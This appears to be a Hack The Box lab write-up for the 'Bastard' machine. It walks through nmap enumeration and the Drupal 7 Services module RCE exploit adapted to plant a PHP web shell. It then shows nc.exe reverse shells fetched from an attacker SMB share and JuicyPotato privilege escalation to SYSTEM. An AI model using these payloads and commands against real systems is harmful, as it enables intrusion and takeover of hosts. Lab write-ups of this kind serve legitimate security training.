Bastard

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.9 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Mon Mar  7 14:42:44 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.058s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

# Nmap done at Mon Mar  7 14:43:10 2022 -- 1 IP address (1 host up) scanned in 26.74 seconds

As we see, ports 80, 135 and 49154 are open. Let's try to obtain more information about the services and versions running on those ports.

nmap -sC -sV -p80,135,49154 10.10.10.9 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Mon Mar  7 14:45:20 2022 as: nmap -sCV -p80,135,49154 -oN targeted 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar  7 14:46:25 2022 -- 1 IP address (1 host up) scanned in 65.35 seconds

Exploitation

On port 80 we have a Drupal 7. Let's look for any common exploit for that version of Drupal.

searchsploit Drupal 7.X

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 7.x Module Services - Remote Code Execution                                                                                                                                                         | php/webapps/41564.php
Drupal < 7.34 - Denial of Service                                                                                                                                                                          | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                                                                                   | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                                                                                                | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                                                        | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                                    | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                                                                                                           | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                                                                                                      | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                                                                                                             | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                                                                                                         | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                                                                                                          | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                                                                                                                     | php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                                                                                                              | php/remote/40144.php
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                                                                                                          | php/remote/40130.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Let's move the first exploit to our current folder.

searchsploit -m php/webapps/41564.php

-m copies an exploit to the current working directory.

  Exploit: Drupal 7.x Module Services - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/41564
     Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: C++ source, ASCII text

Copied to: /home/alfa8sa/HTB/machines/bastard/41564.php

Before executing it, we will have to change a few things.

nano 41564.php

First, let's change the $url variable with the URL of the Bastard machine.

$url = 'http://10.10.10.9';

Then we'll have to verify if the $endpoint_path exits. If we search for http://10.10.10.9/rest_endpoint we'll get an error saying that the requested page doesn't exist.

But don't worry, if you search for the http://10.10.10.9/rest directory we will get a message.

So on the PHP script we'll have to change the $endpoint_path variable to /rest.

$endpoint_path = '/rest';

Finally, we'll have to modify the $file variable, by changing the filename and the data fields. At the data field we'll put some PHP code that will execute at a system level whatever we pass through the cmd parameter.

$file = [
    'filename' => 'rce.php',
    'data' => '<?php echo "<pre>" . shell_exec($_REQUEST[\'cmd\']) . "</pre>";?>'
];

Finally, we could run the script.

php 41564.php

# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce


#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/rce.php

Now we could access http://10.10.10.9/rce.php and execute commands with the ?cmd parameter.

curl http://10.10.10.9/rce.php?cmd=whoami

<pre>nt authority\iusr
</pre>

Time to get a shell. First, let's set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Then you'll have to download nc.exe and set an SMB server with the impacket-smbserver tool in the directory where the binary is located.

impacket-smbserver smbFolder $(pwd) -smb2support

Finally, if we access the previous URL indicating the nc.exe binary located in the shared folder, we could send us back a reverse as the nt authority\iusr user, and we could grab the user flag.

http://10.10.10.9/rce.php?cmd=\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444

listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49422
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

C:\inetpub\drupal-7.54>type \users\dimitris\desktop\user.txt
type \users\dimitris\desktop\user.txt
9026b4905694e46ffc32a38fa2571407

Privilege Escalation

Let's see what privileges the user nt authority\iusr has.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.

JuicyPotato is a local privilege escalation tool for Windows, which uses COM objects for privilege escalation. It is needed that SeImpersonate or SeAssignPrimaryToken are enabled.

https://github.com/ohpe/juicy-potato

To escalate privileges, we'll have to transfer JuicyPotato.exe to the victim machine. Let's set a python HTTP server on the directory where we have the JuicyPotato binary.

python -m SimpleHTTPServer

And download the binaries from the desktop folder of the nt authority\iusr user.

certutil.exe -f -urlcache -split http://10.10.14.11:8000/JuicyPotato.exe JuicyPotato.exe

Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.

nc -lvnp 5555

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

And let's set an SMB server on the directory where the nc.exe binary is located.

impacket-smbserver smbFolder $(pwd) -smb2support

Finally, let's run the JuicyPotato binary to get a shell as the NT AUTHORITY\SYSTEM user.

JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555"

-t createprocess call.
-l COM server listen port.
-p program to launch.
-a specify command arguments.

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
COM -> recv failed with error: 10038

But we get an error. This is happening because JuicyPotato is using the default CLSID. If check for system information, we'll see the machine is a Microsoft Windows Server 2008 R2 Datacenter.

systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          7/3/2022, 3:48:18 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.585 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.606 MB
Virtual Memory: In Use:    489 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

So we have to change the CLSID to a valid one. You can check a Windows 8 CLSID list here.

The Class ID, or CLSID, is a serial number that represents a unique ID for any application component in Windows. In practice, this means all registry entries for an application component can usually be found under the registry key HKEY_CLASSES_ROOT\CLSID{CLSID value}.

If we change it for {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}, we should get the reverse shell. Then all we have to do is reap the harvest and take the root flag.

JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555" -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"

-t createprocess call.
-l COM server listen port.
-p program to launch.
-a specify command arguments.
-c use CLSID.

listening on [any] 5555 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49455
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
1d20b21916f1064ba7b0232d6725edeb

Last updated 2 years ago

Was this helpful?